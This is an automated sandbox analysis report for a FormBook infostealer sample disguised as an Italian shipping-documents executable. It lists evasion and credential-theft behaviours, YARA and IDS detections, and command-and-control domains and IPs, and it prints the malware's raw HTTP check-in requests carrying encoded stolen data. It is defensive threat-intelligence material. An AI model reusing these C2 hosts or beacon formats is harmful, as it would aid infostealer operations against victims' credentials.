Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AWB_5771388044 Documenti di spedizione.exe

Overview

General Information

Sample name:AWB_5771388044 Documenti di spedizione.exe
Analysis ID:1515429
MD5:15fcfde4bcde8e7dce181856e02b1b24
SHA1:1e87dd4312940e1aa8c3844953a61bc095772418
SHA256:d53e08fc9d3d0153b73b816b38fed23a03f6fa94135ff483e4634d0141c9cbdd
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

Process Tree

  • System is w10x64
  • AWB_5771388044 Documenti di spedizione.exe (PID: 7264 cmdline: "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe" MD5: 15FCFDE4BCDE8E7DCE181856E02B1B24)
    • svchost.exe (PID: 7296 cmdline: "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • pSySrLvnviNdEH.exe (PID: 1904 cmdline: "C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • taskkill.exe (PID: 7676 cmdline: "C:\Windows\SysWOW64\taskkill.exe" MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
          • firefox.exe (PID: 7812 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.2131558880.0000000002E90000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.2131558880.0000000002E90000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13f9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.3591898064.0000000003070000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.3591898064.0000000003070000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13f9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000006.00000002.3591841259.0000000003020000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.4d0000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.4d0000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2eff3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17242:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.4d0000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.4d0000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e1f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16442:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe", CommandLine: "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe", CommandLine|base64offset|contains: ., Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe", ParentImage: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, ParentProcessId: 7264, ParentProcessName: AWB_5771388044 Documenti di spedizione.exe, ProcessCommandLine: "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe", ProcessId: 7296, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe", CommandLine: "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe", CommandLine|base64offset|contains: ., Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe", ParentImage: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, ParentProcessId: 7264, ParentProcessName: AWB_5771388044 Documenti di spedizione.exe, ProcessCommandLine: "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe", ProcessId: 7296, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-22T18:02:25.044941+020020507451Malware Command and Control Activity Detected192.168.2.44973654.179.173.6080TCP
            2024-09-22T18:02:49.600999+020020507451Malware Command and Control Activity Detected192.168.2.449741206.119.82.14780TCP
            2024-09-22T18:03:03.365570+020020507451Malware Command and Control Activity Detected192.168.2.44974581.88.63.4680TCP
            2024-09-22T18:03:16.780789+020020507451Malware Command and Control Activity Detected192.168.2.44974967.223.117.18980TCP
            2024-09-22T18:03:30.374979+020020507451Malware Command and Control Activity Detected192.168.2.44975385.159.66.9380TCP
            2024-09-22T18:03:59.827293+020020507451Malware Command and Control Activity Detected192.168.2.449757208.91.197.2780TCP
            2024-09-22T18:04:19.036132+020020507451Malware Command and Control Activity Detected192.168.2.449761195.161.68.880TCP
            2024-09-22T18:04:32.644463+020020507451Malware Command and Control Activity Detected192.168.2.449765194.58.112.17480TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for domain / URL
            Source: tempatmudisini01.clickVirustotal: Detection: 5%Perma Link
            Multi AV Scanner detection for submitted file
            Source: AWB_5771388044 Documenti di spedizione.exeReversingLabs: Detection: 68%
            Source: AWB_5771388044 Documenti di spedizione.exeVirustotal: Detection: 47%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.4d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2131558880.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3591898064.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3591841259.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3600066837.0000000008F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3593251845.00000000028D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3591581349.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2132078710.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2131255938.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: AWB_5771388044 Documenti di spedizione.exeJoe Sandbox ML: detected
            Source: AWB_5771388044 Documenti di spedizione.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pSySrLvnviNdEH.exe, 00000005.00000002.3591578337.000000000028E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: AWB_5771388044 Documenti di spedizione.exe, 00000000.00000003.1742877662.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, AWB_5771388044 Documenti di spedizione.exe, 00000000.00000003.1741605002.0000000004880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2033813185.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131590936.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2031785943.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131590936.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2133606313.0000000004E57000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2131496919.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593157085.000000000519E000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593157085.0000000005000000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: AWB_5771388044 Documenti di spedizione.exe, 00000000.00000003.1742877662.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, AWB_5771388044 Documenti di spedizione.exe, 00000000.00000003.1741605002.0000000004880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2033813185.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131590936.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2031785943.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131590936.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, taskkill.exe, 00000006.00000003.2133606313.0000000004E57000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2131496919.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593157085.000000000519E000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593157085.0000000005000000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: taskkill.pdbGCTL source: svchost.exe, 00000001.00000003.2099883367.000000000082C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2099755075.000000000081B000.00000004.00000020.00020000.00000000.sdmp, pSySrLvnviNdEH.exe, 00000005.00000003.2200626845.0000000000C7F000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.0000000006ADC000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.000000000562C000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3591945619.00000000030DB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2417378163.0000000036CBC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.0000000006ADC000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.000000000562C000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3591945619.00000000030DB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2417378163.0000000036CBC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: taskkill.pdb source: svchost.exe, 00000001.00000003.2099883367.000000000082C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2099755075.000000000081B000.00000004.00000020.00020000.00000000.sdmp, pSySrLvnviNdEH.exe, 00000005.00000003.2200626845.0000000000C7F000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_02B4C360 FindFirstFileW,FindNextFileW,FindClose,6_2_02B4C360
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then xor esi, esi1_2_004E83BA
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeCode function: 4x nop then xor eax, eax5_2_08F1EE6C
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 4x nop then xor eax, eax6_2_02B39AF0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 4x nop then pop edi6_2_02B3DF6E
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 4x nop then mov ebx, 00000004h6_2_04E504DE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49753 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49741 -> 206.119.82.147:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49757 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49749 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49745 -> 81.88.63.46:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 54.179.173.60:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49765 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49761 -> 195.161.68.8:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.uburn.xyz
            Source: Joe Sandbox ViewIP Address: 67.223.117.189 67.223.117.189
            Source: Joe Sandbox ViewIP Address: 208.91.197.27 208.91.197.27
            Source: Joe Sandbox ViewASN Name: VIMRO-AS15189US VIMRO-AS15189US
            Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
            Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
            Source: Joe Sandbox ViewASN Name: REGISTER-ASIT REGISTER-ASIT
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global trafficHTTP traffic detected: GET /pk64/?4rl8h=D2L+4j8Jfvzl8MUfQ9khdgsUc3RmXuRTEOKFuX1NYvsOSSQcePjFDW5WJ5RMGSKYSsEK0HwMz36kWpHuw/f75AJHHPht/yIbLRYuc71CiG5Lg6cOqhMe3mM=&CfmHC=h4QXpn780jb HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.tmstore.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global trafficHTTP traffic detected: GET /66vh/?4rl8h=kbtx4jUoEeJqru/eYSGX4Vxi+vYrNV7S+715NBpuIdmHZ1xIlp9jyY2cSJRvQOMSNpijnqr9Yv3PN/2sQDysWmAbAiXLeLXP7wBnaxk7t3LbEP86e95cii4=&CfmHC=h4QXpn780jb HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.wdeb18.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global trafficHTTP traffic detected: GET /znmp/?4rl8h=FLkVAxn7xj4ld/LvMrFB+iyX7UR4Kb9aE0AH2N1ZkKvu5bquFbdTibpxDosPiJzFKWZ1tBPnHLgAGvmlA5vrecd2eGdXAGmup0nokTlXrk0eb8OdUo3hkYI=&CfmHC=h4QXpn780jb HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.2bhp.comConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global trafficHTTP traffic detected: GET /unks/?4rl8h=cdhJ2J1BF/3FP1t6JbliQByYvepm5n0GJvy2RzMWe/YhGvvDNzkKTft45HunghqbyAFMp5DD9OJS7Rih3uNIOlCSON0kvMqKINfWmh1G6LwRZZAk9zqDBj8=&CfmHC=h4QXpn780jb HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.uburn.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global trafficHTTP traffic detected: GET /og3c/?4rl8h=PJMN73v+cS+JEOCp4MHXb74XFyLCcf/8AP5dNED26sKmApKDXWDqmSS3jfO80ER4JfpprrZAuqpt1wLlM7DUug2WU25CtLkRmct6bnS3AqTVtMg1RKgxnn8=&CfmHC=h4QXpn780jb HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.sppsuperplast.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global trafficHTTP traffic detected: GET /c45k/?4rl8h=08ptcl9k6k3Clc+jjfTphEeOe2lz7AEUYr4PirX9ycnlRkqnpIEJhgCFSf5hEjt7uErMgv9wtAp1yqXhXhWRgW+nHLlYanRICP4JCJqgUGT9OLnA1kIzPD4=&CfmHC=h4QXpn780jb HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.palcoconnector.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global trafficHTTP traffic detected: GET /0dae/?CfmHC=h4QXpn780jb&4rl8h=jXNXsyq5R/QDxa7bJ2ljemvTesZ1LTXEaXuC8OrACrNOR23rlYUr+PSW9bwqyvvRK2/UTV39N9+HzvOrg18nL3Fjm+gENjZiKF7fGS3+8e9UoB+RgXgdxF4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.trapkitten.websiteConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global trafficHTTP traffic detected: GET /vyk8/?4rl8h=/8W9lHmy/meYp2fNs3efAdRvbFxf2DuKL4zSfhQhCqnq6Zc+yf7I5zlrSSPwb+CI3DZqbI5vil5mP2MKXHyCXZgHhQsXe7748Z5EYcVgGcHWqsQ0OU2KuuY=&CfmHC=h4QXpn780jb HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.albero-dveri.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global trafficDNS traffic detected: DNS query: www.tmstore.click
            Source: global trafficDNS traffic detected: DNS query: www.wdeb18.top
            Source: global trafficDNS traffic detected: DNS query: www.2bhp.com
            Source: global trafficDNS traffic detected: DNS query: www.uburn.xyz
            Source: global trafficDNS traffic detected: DNS query: www.sppsuperplast.online
            Source: global trafficDNS traffic detected: DNS query: www.palcoconnector.net
            Source: global trafficDNS traffic detected: DNS query: www.trapkitten.website
            Source: global trafficDNS traffic detected: DNS query: www.albero-dveri.online
            Source: global trafficDNS traffic detected: DNS query: www.tempatmudisini01.click
            Source: unknownHTTP traffic detected: POST /66vh/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.wdeb18.topContent-Type: application/x-www-form-urlencodedContent-Length: 202Connection: closeCache-Control: no-cacheOrigin: http://www.wdeb18.topReferer: http://www.wdeb18.top/66vh/User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Data Raw: 34 72 6c 38 68 3d 70 5a 46 52 37 58 55 78 4a 2f 63 4b 30 2b 53 50 66 51 48 70 77 6d 5a 63 6e 4f 77 52 50 42 7a 34 70 72 6f 5a 63 41 39 34 48 59 2b 70 4a 32 6b 6b 73 37 39 47 75 62 69 72 50 49 74 41 45 4d 38 30 45 37 50 4f 2f 75 61 6c 52 76 6a 77 45 73 36 76 64 54 75 76 4c 45 77 39 41 79 66 4f 53 4c 62 52 75 51 74 33 58 31 64 79 67 58 6a 44 4b 74 6f 4b 58 4a 63 35 6d 44 6d 42 64 30 58 64 36 79 31 4f 43 35 2b 54 5a 44 51 31 70 50 72 74 56 38 42 61 72 72 45 57 34 52 32 70 48 4b 32 75 35 6d 74 50 50 53 57 7a 38 52 4d 4a 56 73 36 54 4b 50 4b 6f 52 70 73 68 59 72 50 6f 34 6a 4f 2b 51 73 77 39 67 67 3d 3d Data Ascii: 4rl8h=pZFR7XUxJ/cK0+SPfQHpwmZcnOwRPBz4proZcA94HY+pJ2kks79GubirPItAEM80E7PO/ualRvjwEs6vdTuvLEw9AyfOSLbRuQt3X1dygXjDKtoKXJc5mDmBd0Xd6y1OC5+TZDQ1pPrtV8BarrEW4R2pHK2u5mtPPSWz8RMJVs6TKPKoRpshYrPo4jO+Qsw9gg==
